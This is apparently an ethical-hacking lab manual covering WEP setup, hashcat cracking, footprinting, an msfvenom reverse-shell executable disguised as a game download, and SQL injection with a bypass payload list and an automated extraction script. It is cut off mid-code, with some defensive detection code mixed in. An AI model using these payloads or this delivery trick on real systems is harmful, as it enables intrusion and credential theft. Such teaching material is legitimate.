WAN Security and Ethical Hacking Techniques

The document outlines a series of experiments focused on network security, including assessing WAN systems, applying encryption algorithms, and conducting data gathering on targeted websites. Each experiment includes specific aims, procedures, and results related to ethical hacking techniques, secure communications, and information gathering methods. The overall goal is to enhance understanding of network security practices and vulnerabilities.

Uploaded by

717822y141

INDEX

Sl. No Name of Experiment

1 Assessing and securing systems on a Wide Area Network (WAN).

2 Applying encryption and hashing algorithms for secure communications.

3 Data gathering and footprinting on a targeted web site.

4 Using ethical hacking techniques to exploit a vulnerable workstation.

5 Auditing a wireless network and planning for a secure WLAN implementation.

6 Attacking a vulnerable web application and database.

7 Identifying and removing malware on a Windows system.

8 Analyzing network traffic to create a baseline definition.

9 Securing the network with an Intrusion Detection System (IDS).


EX NO: 1 Assessing and securing systems on a Wide Area Network (WAN)

Aim:

To study about Assessing and securing systems on a Wide Area Network (WAN)

Procedure:

Step 1: We need the devices listed in the table below to set up the network topology.

Step 2: Configure the laptops to make them wireless. First, click on Laptop0 and turn off its power so that the port module can be changed: we replace the wired port with the WPC300N wireless port.

• Replace the port with the WPC300N and make sure to turn the laptop back on.
• Repeat the same procedure with Laptop1 and Laptop2.
• After that, we will assign IP addresses and a default gateway to the laptops.

Step 3: Configure the router with an IP address and generate a security key.

• First, click on the Router and go to the GUI.
• Then click on Setup, where you will find the IP address assigned to [Link] and the subnet mask [[Link]].
• Then disable the DHCP server, because we are going to configure the addresses statically.
• Then save the settings.
• Then move to the Wireless option.
• Set the Network Name (SSID) to HomeNetwork.
• Save the settings.
• Then we set the security key.
• Click on Wireless Security and select the security mode WEP.
• Then generate the key by entering a 10-digit hexadecimal value, e.g. 0123456789, and save the settings.

Step 4: Now we will configure the laptops using the IP addressing table given below.

Configure Laptop0: To configure the laptop, first set the IP configuration to Static, then add the IPv4 address and the default gateway.

Step 5: Connect the laptop to the router by entering the security key on the laptop.
• Click on Laptop0 and go to Desktop.
• Click on Connect and refresh the network list.
• After a few seconds, it will show the name of the network we have assigned.
• Click on HomeNetwork.
• Then enter the security key in WEP Key 1 and click Connect.
• Laptop0 will connect to the router.
• Repeat the same process with Laptop1 and Laptop2 so that they can connect to the router.
• After all of this, all of the hosts are connected to the router.

Step 6: Then we verify the wireless connection by pinging the IP address of any laptop, or by sending and receiving data packets. For example, go to the command prompt of Laptop0 and type the following command:

command: ping [Link]

Result:

Hence, Assessing and securing systems on a Wide Area Network (WAN) was studied successfully.

EX NO: 2 Applying encryption and hashing algorithms for secure communications

AIM:

To study about Applying encryption and hashing algorithms for secure communications.

PROCEDURE:

Hashing is an algorithm that generates a fixed-length string from an input.

There are many different hash algorithms with different properties, for example, SHA-256.

You can use openssl to generate a SHA-256 hash:

echo -n 'secret' | openssl dgst -sha256

The output is the hash:

2bb80d537b1da3e38bd30361aa855686bde0eacd7162fef6a25fe97bf527a25b

Hashes have a special property: they are easy to compute but difficult to reverse. Given the hash above, it
is difficult to find its origin, “secret”.

This makes hashes a good method to verify passwords. Rather than storing the password itself and risking
it being stolen, you store the password’s hash; when a user provides a password, you compute its hash
and compare it to the stored value. If they match, the user entered the correct password.

Cracking a SHA-256 Hash

But hashes can be reversed using methods such as dictionary attacks, which compare the given hash to
the hashes of common words from a dictionary, or brute force, which computes the hash of many different
combinations of characters until it finds one that matches the given hash. This is, of course, not very efficient,
but, with enough compute power and time, it often works.

Let’s see an example:

Suppose you were given the hash above and you want to find its origin. To do that, you can utilize a tool
called hashcat.

First you need to install it. I used the following steps to install it on macOS Catalina
(requires git and make which you can get with brew):

git clone [Link]
mkdir -p hashcat/deps
git clone [Link] hashcat/deps/OpenCL
cd hashcat/ && make install

Next you need to find the identifier (Hash mode or Hash-type) of your hash algorithm. For SHA-256 it’s
1400. You can see all codes on this page (or with hashcat --help).

Now run a brute-force attack:

hashcat -m 1400 -a 3 2bb80d537b1da3e38bd30361aa855686bde0eacd7162fef6a25fe97bf527a25b

And after a short while, you should get:

2bb80d537b1da3e38bd30361aa855686bde0eacd7162fef6a25fe97bf527a25b:secret
Session..........: hashcat
Status...........: Cracked
[Link]......: SHA2-256
[Link]......: 2bb80d537b1da3e38bd30361aa855686bde0eacd7162fef6a25 .. 27a25b
[Link]...: Tue Sep 22 [Link] 2020 (10 secs)
[Link] .: Tue Sep 22 [Link] 2020 (0 secs)
[Link].......: ?1?2?2?2?2?2 [6]
[Link]. .: -1 ?l?d?u, -2 ?l?d, -3 ?l?d*!$@_, -4 Undefined
[Link]: 6/15 (40.00%)
Speed.#1.........: 55535.2 kH/s (6.90ms) @ Accel:256 Loops:128 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests
Progress.........: 521502720/3748902912 (13.91%)
Rejected.........: 0/521502720 (0.00%)
[Link]....: 233472/1679616 (13.90%)
[Link].#1...: Salt:0 Amplifier:0-128 Iteration:0-128
Candidates.#1....: sacers -> co9ish
Started: Tue Sep [Link]
Stopped: Tue Sep 22 [Link] 2020

You can see that the status is “Cracked” and the original “secret” just above that.

Cracking an HMAC SHA-256 Hash

Let’s try a slightly more advanced example. This time we will use a different algorithm called
HMAC-SHA-256, which requires not only the input string but also a secret key.

First, let’s generate the hash of ‘Lucy in the sky of diamonds’ with the secret key ‘secret’:
echo -n 'Lucy in the sky of diamonds' | openssl dgst -sha256 -hmac 'secret'

This will generate the hash:

116fb393a265d0eb638a6070e5b051a2987e33195eef0e13443f9d8d3e5668b5

Now let’s try to reverse it. The Hash mode of HMAC-SHA-256 is 1450. We pass a string comprising the
hash and the original text separated by a colon:

hashcat -m 1450 -a 3 "116fb393a265d0eb638a6070e5b051a2987e33195eef0e13443f9d8d3e5668b5:Lucy in the sky of diamonds"

After a minute or so, you should get the result which is the secret key “secret”:

116fb393a265d0eb638a6070e5b051a2987e33195eef0e13443f9d8d3e5668b5:Lucy in the sky of diamonds:secret
Session..........: hashcat
Status...........: Cracked
[Link]........: HMAC-SHA256 (key = $pass)
[Link]......: 116fb393a265d0eb638a6070e5b051a2987e33195eef0e13443....amonds
[Link]...: Tue Sep 22 [Link] 2020 (41 secs)
[Link] .: Tue Sep 22 [Link] 2020 (0 secs)

A few more advanced tricks with hashcat

1. You can crack multiple hashes by putting them in a file and running:
hashcat -m 1450 -a [Link]

Each line in the file should be in the form “hash” for SHA-256 or “hash:original text” for HMAC-SHA-256.

2. You can use custom character sets and patterns. For example, this command searches for secrets consisting of
six lowercase letters only:

hashcat -m 1450 -a 3 -1 abcdefghijklmnopqrstuvwxyz "116fb393a265d0eb638a6070e5b051a2987e33195eef0e13443f9d8d3e5668b5:Lucy in the sky of diamonds" "?1?1?1?1?1?1"

3. After successfully cracking a hash, hashcat stores it in ~/.hashcat/[Link]. If you want to run
the same crack again, you need to remove the result from this file, otherwise hashcat will simply return
the cached result.

RESULT:

Thus, Applying encryption and hashing algorithms for secure communications has been
studied successfully.

EX NO: 3 Data gathering and footprinting on a targeted web site

AIM:

To study about Data gathering and footprinting on a targeted web site.

PROCEDURE:

What type of information to collect


Generally, there are 3 types of information that can be identified by information gathering.

• Network Information: such as domain name, IP addresses, websites, protocols used, VPNs, authentication mechanisms, and list of network systems.
• System Information: such as users, system banners, SNMP information, system architecture, operating systems, usernames, and passwords.
• Organizations’ Information: such as employee details, organization’s website, local details, address and phone numbers, security policies implemented, social media posts, news articles, and press releases.

Information gathering sources

The goal of information gathering is to collect as much information as possible about the
target. So any source that can give us information about the target is valuable.

Some common sources for information gathering are as follows:

• DNS
• Whois
• IP and Ports
• Social media
• Address books and offline sources
• Website

Let’s see what kind of information we can get from each source.

DNS interrogation
Security testing starts with one or more targets. By targets, we mean domain names or IP
addresses. The place to find out more about domains and IPs is the Domain Name System
(DNS) servers. We can find the IP addresses corresponding to a domain name and vice versa using DNS
footprinting (aka DNS interrogation). Another good place to find the subdomains of a domain
is Google search.

Tools for DNS interrogation: nslookup, DNS enumerator, Sam Spade

Whois

Who is the owner of a domain or IP address? WHOIS is a query and response protocol to
answer this question. You can search any domain or IP in public databases to get
information like the expiration date, current registrar, registrant information, etc.

Tools: Google for “Whois”

IP and Ports
After collecting IP addresses we should look for open ports and running services. Using
tools like Ping, Telnet, Nmap, and others you can determine live IPs and running
services.

⛔ WARNING: IP and port scanning is an active footprinting technique, and performing it
without authorization is illegal in some countries.

Once you’ve found an open port you can do banner grabbing to learn more about the
service running behind the port. Many services send information like the service version
and OS name in their responses. This information is known as a banner, and fetching it
is called banner grabbing.

For example, in the session below an HTTP request has been sent to the target and the
server response contains the web server name and the underlying operating system.

$ nc target 80
HEAD / HTTP/1.1

HTTP/1.1 400 Bad Request
Date: Sun, 27 Jun 2021 [Link] GMT
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 306
Connection: close
Content-Type: text/html; charset=iso-8859-1

Tools for IP and port scanning: Ping, Telnet, NetCat, Nmap, SuperScan

Social Media
Social media sites are growing more than ever and now it’s part of our day-to-day life.
People sometimes share detailed information on public pages without knowing that this
information can be abused by malicious users. Places like Facebook, Instagram, LinkedIn,
and other social media sites are good places where valuable information is shared by users.

Address Books and Offline Sources

Looking into address books and trash bins, or simply asking people, are a few of the
oldest information gathering methods.

In the IT world dumpster diving refers to retrieving information from disposed items
that could be used to carry out an attack or gain access to a computer network.

Website Information Gathering


Websites can reveal important information like server technologies, CMS, backend
database, email addresses, and much more.

You can read our previous post to learn more about passive information gathering methods.

Generally speaking, active scanning methods which can be used for information
gathering are Fuzzing, testing for misconfigurations, and testing for known
vulnerabilities.

Fuzzing refers to manipulating and sending crafted requests to the webserver to trick it into
yielding information. Sometimes trying different inputs which are not expected by the web
application can make the web application throw a detailed error message. Such error
messages can reveal OS, server-side technologies, databases, or many other things. Also, the
behavior of the webserver (the way it responds to the request) can reveal information like
the webserver type.

Testing for misconfigurations: Using default or insecure configurations is a common
mistake that leaves valuable information unprotected. For example, a badly
configured Apache web server can show a huge amount of information at the /server-info
URL. Misconfigurations can be found anywhere. Another example is a public
community string for an SNMP service, which can disclose a tremendous amount of
information about the system.

Testing for known vulnerabilities: You may have heard of the Heartbleed bug, which allows
anyone on the Internet to read the memory of systems protected by vulnerable
versions of the OpenSSL software. Using similar bugs and vulnerabilities is another
method for collecting target information.

What to do with Collected Information


The next steps after information gathering are scanning and gaining access to the target.
Sometimes (if you’re lucky) you can find information like passwords that allow direct access
to the systems but most of the time you can only find the type of OS, web server, or
database.

How to Protect Against Information Gathering


You should try to eliminate the disclosure of sensitive information. Below are some best
practices you can use to achieve it.

1. Classify the types of information that can be kept public.
2. Don’t publish unnecessary information in any profile, social networking account, or website.
3. Keep internal DNS and external DNS separate.
4. Restrict DNS zone transfers to authorized servers, or disable them.
5. Establish a disposal policy where all papers are shredded before being recycled.
6. Educate your employees to prevent unwanted information disclosure.
7. Audit and scan your website and network for any information leakage.
8. Keep your systems updated.
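An added Python example (not from the lab) that does the audit item 7 asks for on the banner-grabbing case shown earlier: it parses a raw HTTP response and reports the product version and platform hints a scanner would harvest from it. LAB_RESPONSE reproduces the headers captured with nc above (the clock time in Date is constructed); HARDENED_RESPONSE is a constructed version of the same reply with the banner trimmed.

```python
"""Audit an HTTP response for banner information leakage.

Added example, not part of the lab. LAB_RESPONSE reproduces the headers captured
with `nc target 80` in the lab (the clock time in Date is constructed);
HARDENED_RESPONSE is a constructed reply with the banner trimmed, as produced by
e.g. `ServerTokens Prod` on Apache."""
import re
from typing import Dict, List, Tuple

LAB_RESPONSE = (
    "HTTP/1.1 400 Bad Request\r\n"
    "Date: Sun, 27 Jun 2021 10:00:00 GMT\r\n"
    "Server: Apache/2.2.22 (Debian)\r\n"
    "Vary: Accept-Encoding\r\n"
    "Content-Length: 306\r\n"
    "Connection: close\r\n"
    "Content-Type: text/html; charset=iso-8859-1\r\n"
    "\r\n"
)

HARDENED_RESPONSE = (
    "HTTP/1.1 400 Bad Request\r\n"
    "Date: Sun, 27 Jun 2021 10:00:00 GMT\r\n"
    "Server: Apache\r\n"
    "Connection: close\r\n"
    "Content-Type: text/html; charset=iso-8859-1\r\n"
    "\r\n"
)

# Headers that commonly carry product, version or platform details.
BANNER_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "x-generator")
VERSION_RE = re.compile(r"[A-Za-z][\w.-]*/\d+(?:\.\d+)*")  # e.g. Apache/2.2.22, PHP/5.4.4
OS_HINT_RE = re.compile(r"\(([^)]+)\)")                    # e.g. (Debian), (Win64)


def parse_response(raw: str) -> Tuple[str, Dict[str, str]]:
    """Return the status line and the headers keyed by lower-cased name; the body is ignored."""
    head = raw.split("\r\n\r\n", 1)[0]
    status, *lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return status, headers


def audit_banner(raw: str) -> List[Tuple[str, str, str]]:
    """Report (header, kind, value) findings: 'version' when a product/version token
    is present, 'platform' when a parenthesised OS or distribution hint is."""
    _status, headers = parse_response(raw)
    findings: List[Tuple[str, str, str]] = []
    for hdr in BANNER_HEADERS:
        value = headers.get(hdr)
        if not value:
            continue
        m = VERSION_RE.search(value)
        if m:
            findings.append((hdr, "version", m.group(0)))
        m = OS_HINT_RE.search(value)
        if m:
            findings.append((hdr, "platform", m.group(1)))
    return findings


if __name__ == "__main__":
    for name, raw in (("lab capture", LAB_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(name + ":", audit_banner(raw) or "no banner disclosure")
```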

RESULT:

Hence, Data gathering and footprinting on a targeted web site was studied
successfully.

EX NO: 4
Ethical hacking techniques to exploit a vulnerable workstation.

AIM:
To study about Using ethical hacking techniques to exploit a vulnerable workstation.

PROCEDURE:

Create the Metasploit payload

Before creating the payload, we need to find the local IP of our Kali Linux machine.

For that, run ```ip addr``` or ```ifconfig```

Note the IPv4 local IP.

Now let’s get our hands dirty!

In the terminal run the following command:

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows -f exe LHOST=[Link] LPORT=4444 -o /root/Desktop/[Link]

The command above instructs msfvenom to generate a 32-bit Windows executable file that
implements a reverse TCP connection for the payload. The format must be specified as being
type .exe, and the local host (LHOST) and local port (LPORT) have to be defined. In our
case, the LHOST is the IP address of our attacking Kali Linux machine that we got in the last
command, and the LPORT is the port to listen on for a connection from the target once it has
been compromised.

The name of the .exe is up to you. In this case I’ll be using [Link] because our
target will be a gamer that we know has GTA V.
Connection

We now need to set up a listener on the port we determined within the executable. We do
this by launching Metasploit using the command msfconsole on the Kali Linux terminal.

The screenshot below shows what commands to issue within Metasploit. First, we’ll tell
Metasploit to use the generic payload handler “multi/handler” using the command ```use
multi/handler```. We will then set the payload to match the one set within the executable
using the command ```set payload windows/meterpreter/reverse_tcp```. We will then
set the LHOST and LPORT with ```set LHOST [Link]``` and ```set LPORT 4444```.
Once done, type ```run``` or ```exploit``` and press Enter.

The screenshot below displays the output. The reverse TCP handler should begin waiting for
a connection.

You can use show options to check that everything is OK.

If everything is OK, type run or exploit.

Social Engineering

Now comes the part where you need to do some social engineering in order to make the user execute
the program.

For this tutorial we will simply host the .exe on apache2 and transfer it to the Windows
machine.

On the Windows machine you just need to access, via the browser, the IP/[Link]

In our case it is [Link]/[Link]

Now execute it and check the connection on the Kali machine.

As you can see, we are now connected to the victim machine.

Now we can do a lot of things.
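The defender’s view of the chain just described (an .exe fetched over HTTP from the attacking host, then a long-lived outbound connection from the same workstation back to that host on the handler’s port), as an added Python detection example that is not part of the lab; every log line, host name and address is constructed, with 192.0.2.10 standing in for the LHOST:

```python
"""Detect the delivery-and-callback pattern of this experiment from a workstation's
outbound logs: an executable downloaded over plain HTTP from an unapproved host,
followed shortly by a long-lived TCP session from the same workstation to the same
host on a port the fleet does not normally use (the reverse_tcp handler).

Added example, not from the lab. Every log line, host name and address below is
constructed; 192.0.2.10 stands in for the attacker's LHOST."""
from datetime import datetime, timedelta
from typing import Dict, List, Tuple
from urllib.parse import urlparse

# Constructed proxy log: timestamp workstation method url status bytes
PROXY_LOG = """\
2024-03-01T09:58:02 ws-17 GET http://updates.example.test/patch.msi 200 9100211
2024-03-01T10:01:15 ws-17 GET http://192.0.2.10/game_update.exe 200 73802
2024-03-01T10:02:40 ws-22 GET http://intranet.example.test/index.html 200 5120
"""

# Constructed egress flow log: timestamp workstation dst_ip dst_port proto duration_s bytes_out
FLOW_LOG = """\
2024-03-01T10:01:20 ws-17 192.0.2.10 4444 tcp 1792 51200
2024-03-01T10:02:41 ws-22 198.51.100.7 443 tcp 3 2048
2024-03-01T10:05:00 ws-17 198.51.100.9 443 tcp 12 8192
"""

APPROVED_DOWNLOAD_HOSTS = {"updates.example.test", "intranet.example.test"}
EXECUTABLE_SUFFIXES = (".exe", ".scr", ".msi", ".dll")
COMMON_PORTS = {22, 25, 53, 80, 443, 587, 993}
CORRELATION_WINDOW = timedelta(minutes=10)
MIN_SESSION_SECONDS = 60  # a shell stays connected; a one-shot download does not


def parse_proxy(log: str) -> List[Dict]:
    rows = []
    for line in log.splitlines():
        ts, host, _method, url, status, size = line.split()
        u = urlparse(url)
        rows.append({"ts": datetime.fromisoformat(ts), "host": host,
                     "server": u.hostname, "path": u.path,
                     "status": int(status), "bytes": int(size)})
    return rows


def parse_flows(log: str) -> List[Dict]:
    rows = []
    for line in log.splitlines():
        ts, host, dst, port, proto, duration, out = line.split()
        rows.append({"ts": datetime.fromisoformat(ts), "host": host, "dst": dst,
                     "port": int(port), "proto": proto,
                     "duration": int(duration), "bytes_out": int(out)})
    return rows


def suspicious_downloads(rows: List[Dict]) -> List[Dict]:
    """Executables fetched successfully from a host that is not an approved source."""
    return [r for r in rows
            if r["status"] == 200
            and r["path"].lower().endswith(EXECUTABLE_SUFFIXES)
            and r["server"] not in APPROVED_DOWNLOAD_HOSTS]


def unusual_egress(flows: List[Dict]) -> List[Dict]:
    """Long-lived outbound TCP sessions to ports outside the expected set."""
    return [f for f in flows
            if f["proto"] == "tcp"
            and f["port"] not in COMMON_PORTS
            and f["duration"] >= MIN_SESSION_SECONDS]


def correlate_reverse_shell(proxy_log: str, flow_log: str) -> List[Tuple[str, str, int, str]]:
    """Pair each suspicious download with an unusual session from the same workstation
    to the same server that starts within CORRELATION_WINDOW after the download.
    Returns (workstation, server, port, filename) for each match."""
    downloads = suspicious_downloads(parse_proxy(proxy_log))
    sessions = unusual_egress(parse_flows(flow_log))
    alerts = []
    for d in downloads:
        for s in sessions:
            delay = s["ts"] - d["ts"]
            if (s["host"] == d["host"] and s["dst"] == d["server"]
                    and timedelta(0) <= delay <= CORRELATION_WINDOW):
                alerts.append((d["host"], s["dst"], s["port"], d["path"].rsplit("/", 1)[-1]))
    return alerts


if __name__ == "__main__":
    for ws, server, port, filename in correlate_reverse_shell(PROXY_LOG, FLOW_LOG):
        print(f"possible reverse shell: {ws} fetched {filename} from {server}, "
              f"then held a session to {server}:{port}")
```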

RESULT:

Thus, Using ethical hacking techniques to exploit a vulnerable workstation was successfully
studied.

EX NO: 5
Auditing a wireless network and planning for a secure WLAN implementation

AIM:

To study about Auditing a wireless network and planning for a secure WLAN
implementation.

PROCEDURE:

TOOL FOR AUDITING: NESSUS

Nessus is a remote security scanning tool, which scans a computer and raises an alert if it
discovers any vulnerabilities that malicious hackers could use to gain access to any
computer you have connected to a network. It does this by running over 1200 checks on a
given computer, testing to see if any of these attacks could be used to break into the
computer or otherwise harm it.

Installation and setting up:

I generally use the terminal, so I will set up Nessus in Kali Linux through the terminal; you can use
the GUI version of Nessus on Windows.

To show active Internet connections:

netstat -nltup

The Nessus local port is highlighted, i.e., 8834.

If you do not see the Nessus port, restart the Nessus service with the following command:

systemctl restart [Link]

Open a new terminal and find your IP address:

$ ifconfig (on Linux)

$ ipconfig (on Windows)

Now combine your IP address with the Nessus port and open it in your browser; this is where you
can scan for vulnerabilities.

For example: your IP address is [Link] and the Nessus port is 8834.

[Link] will then be your link for Nessus.

After opening the link, you will see the Nessus interface as shown below.

In the Nessus user interface, click on Nessus Essentials.

Here you see 16 different vulnerability scans. I performed the basic scan, i.e., the network scan.
You can explore all the other scans in a similar way.

I will be using [Link], which is free to use for vulnerability tests. You can also host
a domain of your own using Metasploit.

Open Network Scan and enter the IP address which you want to scan. There are
many other advanced options that are not recommended for newcomers; if you are interested
you can have a look and proceed.

Click on New Scan.

Launch your scan.

You will get output similar to the image below. Download your scan report as a .pdf file.

Result:

Hence, Auditing a wireless network and planning for a secure WLAN implementation was studied successfully.

EX NO: 6
Exploiting SQL injection vulnerabilities
DATE:
Aim:

To study about Exploiting SQL injection vulnerabilities

Procedure:

SQL Injection is a type of injection attack that makes it possible to execute malicious SQL
statements. These statements control a database server behind a web application. Attackers can use
SQL Injection vulnerabilities to bypass application security measures. They can circumvent
authentication and authorization of a page or web application and retrieve the content of the whole
SQL database. They can also use SQL Injection to add, modify, and delete records in the
database. An SQL Injection vulnerability may affect any site or web application that uses an SQL
database, for example MySQL, Oracle, SQL Server, or others.

Attackers may use it to gain unauthorized access to your sensitive information, customer data, trade
secrets, intellectual property, and that’s only the tip of the iceberg. SQL Injection attacks are one of
the oldest, most prevalent, and most dangerous web application vulnerabilities.

Since this topic is so vast, we will not be able to cover every detail of SQL injection, but
we will explain some of them, starting with the basics. For this purpose, we will use Metasploitable’s
Mutillidae web application, which is vulnerable to SQL Injection attacks, for demonstration purposes
only.

Select the “Mutillidae” link, go to the “Login/Register” tab and register to create an account.

Provide the necessary information and click on the “Create Account” button.

Now let’s use some SQL injection techniques to bypass the login page. Login bypass is,
undoubtedly, one of the most popular SQL injection techniques. This tutorial presents different
ways an attacker can use to defeat a login form.

Discovering SQL injections in the POST field

The login form we will use in our examples is straightforward. It contains two input fields
(username and password), which are both vulnerable. The back-end code builds a query to validate
the username and password supplied by the client. Here is an outline of the page logic:

$query = "SELECT * FROM users WHERE username='$_POST[username]' AND password='$_POST[password]'";

To bypass the login and access restricted areas, the attacker needs to build an SQL fragment that will
change the “WHERE” clause and make it true. For instance, the following login data would give access
to the attacker by abusing the weakness present in the password parameter. For the username put
“[Link]” or “anything” and for the password put (anything' or '1'='1) or (admin' or '1'='1), then try to
log in, and you’ll be presented with an admin login page.

Let’s take a look at the generated query for a moment: (SELECT * FROM users WHERE
username='[Link]' AND password='anything' OR '1'='1'). Due to operator precedence, the “AND”
condition is evaluated first.

Then the “OR” operator is evaluated, making the “WHERE” statement true. The condition will be
true for all rows of the “users” table. It means that the given username is ignored, and the
attacker will be logged in as the first user in the “users” table. It also means that the
attacker does not need to know a username to access the system; the query will find one for
him!

In these straightforward examples, we have seen that an attacker can bypass an authentication
system with SQL injection. Without downplaying the disastrous consequences this might have, it is
essential to mention that an SQL injection can have a much more significant security impact than a
login bypass. Below is a list of strings created by OWASP board member [Link] Islam Tatlilf
that can be used in SQL injection authentication bypass.

or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

Bypassing the login field

In this example, we’ll target only the username field and try to get access. The username field is
vulnerable as well, and it can likewise be exploited to access the system. It would be easier
and more practical for the attacker to bypass authentication this way, since he could
pick which user’s account he wants to log into.

Here is what the SQL injection attack will look like. Put (admin' #) or (admin'--) in the username field
and hit “Enter” to log in. We use “#” or “--” to comment out everything in the query that comes
after the username field, telling the database to ignore the password field: (SELECT * FROM users
WHERE username='admin' # AND password=' '). By using line commenting, the attacker eliminates a
part of the login condition and gains access.
This technique will make the “WHERE” clause true only for one user; in this case, it is “admin”.

Union-based SQL injection

UNION-based SQL injection attacks enable the tester to extract data from the database efficiently.
Since the “UNION” operator can only be used if the two queries have exactly the same structure,
the attacker must craft a “SELECT” statement similar to the original query. To do this, a valid table
name must be known, but it is also necessary to determine the number of columns in the original query and
their data types.

In this tutorial, we will be using the “User Info” page from Mutillidae to perform a Union-based SQL
injection attack. Go to “OWASP Top 10/A1 - Injection/SQLi - Extract Data/User Info” and use a
login bypass technique learned in the previous section to access the page.

From this point, all our attack vectors will be performed in the URL section of the page using the
Union-based technique.

There are two different ways to discover how many columns are selected by the original query. The
first is to inject an “ORDER BY” statement indicating a column number. If the column number
specified is higher than the number of columns in the “SELECT” statement, an error will be returned.
Otherwise, the results will be sorted by the column mentioned.

Since we do not know the number of columns, we start at 1. To find the exact number of columns, the number
is incremented until an error related to the “ORDER BY” clause is returned.
In this example, we incremented it to 6 and received an error message, so the number of
columns is lower than 6.

When we ordered by 5, it worked and displayed some information. It means there are five columns
that we can work with. Now, instead of using the “order by” option, let’s use the “union select”
option and provide all five columns.

Ex: (union select 1,2,3,4,5).

As shown in the screenshot, columns 2, 3, and 4 are usable, so we can substitute those numbers
with any database values to see what they correspond to. Let’s change column 2 to “database()”,
column 3 to “user()”, and column 4 to “version()”.

Ex: (union select 1,database(),user(),version(),5).

This Union command provided us some useful information; now we know that the database is
“owasp10”, which has a user “root@localhost”, and the version of the server is “5.0.51a-3ubuntu5”.
Based on this information, we can search for vulnerabilities or attack vectors to compromise
our target further.

Finding Database Tables

Before building a query to extract sensitive data, the attacker must identify what information to retrieve and where it is stored in the database. Keep in mind that you can only list the tables your database user has access to, that is, the tables the session user owns or has been granted some privilege on. All other tables will appear not to exist.

In MySQL, the table information_schema.tables holds the metadata for every table object. Its most useful columns are listed below.

table_name: the name of the table.

table_schema: the schema (database) in which the table was created.

To limit the list to the current schema, add a WHERE clause that filters table_schema, either with a literal database name or with the DATABASE() or SCHEMA() function.

Ex: (union select 1,table_name,null,null,5 from information_schema.tables where table_schema='owasp10').

Here we retrieve the table names from the owasp10 database.

As you can see, we have access to several tables: accounts, blogs_table, captured_data, credit_cards, hitlog and pen_test_tools.

Extracting sensitive data such as passwords

When the attacker knows the table names, he needs the column names to extract data. In MySQL, the table information_schema.columns describes the columns of every table; the most useful column to read is column_name.

Ex: (union select 1,column_name,null,null,5 from information_schema.columns where table_name='accounts').

Here we extract the column names of the accounts table.

Once we know the column names, we can pull the data out by naming those columns in the UNION query.

Ex: (union select 1,username,password,is_admin,5 from accounts).

As shown in the screenshot, we retrieved every username and password stored in this table. Note that Mutillidae stores its passwords in plaintext; against a real application you would usually obtain password hashes that still have to be cracked.
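The whole manual UNION procedure above (counting columns with ORDER BY, finding the reflected columns, listing tables, listing columns and dumping the accounts table) as one added Python example; it is not code from the original lab or from Mutillidae. It builds its own vulnerable page on an in-memory SQLite database, which is an assumption: SQLite stands in for MySQL, so sqlite_master plays the role of information_schema.tables and pragma_table_info() the role of information_schema.columns, and the table contents are constructed. It also shows the fix, a parameterised query, against which the same probes find nothing.

```python
import sqlite3

# Constructed sample data standing in for the lab's owasp10 database.
SAMPLE_ACCOUNTS = [
    (1, "admin", "adminpass", "Monkey!", "TRUE"),
    (2, "adrian", "somepassword", "Zombie Films Rock!", "TRUE"),
    (3, "john", "monkey", "I like the smell of confunk", "FALSE"),
]


def build_target_db():
    """In-memory SQLite database with two tables (assumption: SQLite stands in for MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE accounts(cid INTEGER, username TEXT, password TEXT,"
        " mysignature TEXT, is_admin TEXT);"
        "CREATE TABLE credit_cards(ccid INTEGER, ccnumber TEXT, ccv TEXT, expiration TEXT);"
        "INSERT INTO credit_cards VALUES (1, '4444111122223333', '745', '2012-03-01');"
    )
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?, ?, ?)", SAMPLE_ACCOUNTS)
    return conn


def vulnerable_page(conn, username):
    """Deliberately vulnerable: the parameter is concatenated into the SQL string.
    Five columns are selected but the template renders only positions 2, 3 and 4."""
    sql = ("SELECT cid, username, password, mysignature, is_admin "
           "FROM accounts WHERE username = '%s'" % username)
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return "Error: %s" % exc
    return "\n".join("%s|%s|%s" % (row[1], row[2], row[3]) for row in rows)


def hardened_page(conn, username):
    """The fix: a parameterised query. The probes below find nothing against it."""
    sql = ("SELECT cid, username, password, mysignature, is_admin "
           "FROM accounts WHERE username = ?")
    rows = conn.execute(sql, (username,)).fetchall()
    return "\n".join("%s|%s|%s" % (row[1], row[2], row[3]) for row in rows)


def find_column_count(page, max_cols=20):
    """Raise ORDER BY n until the database errors; the last good n is the column count."""
    for n in range(1, max_cols + 1):
        if page("' ORDER BY %d-- " % n).startswith("Error:"):
            return n - 1
    return None


def find_reflected_columns(page, ncols):
    """UNION SELECT a distinct marker per position and see which ones reach the page."""
    markers = ", ".join("'MARK%d'" % i for i in range(1, ncols + 1))
    body = page("' UNION SELECT %s-- " % markers)
    return [i for i in range(1, ncols + 1) if "MARK%d" % i in body]


def union_rows(page, ncols, reflected, exprs, suffix=""):
    """Put expressions into reflected positions (NULL elsewhere) and parse the rendered rows."""
    cols = ["NULL"] * ncols
    for slot, expr in exprs.items():
        cols[slot - 1] = expr
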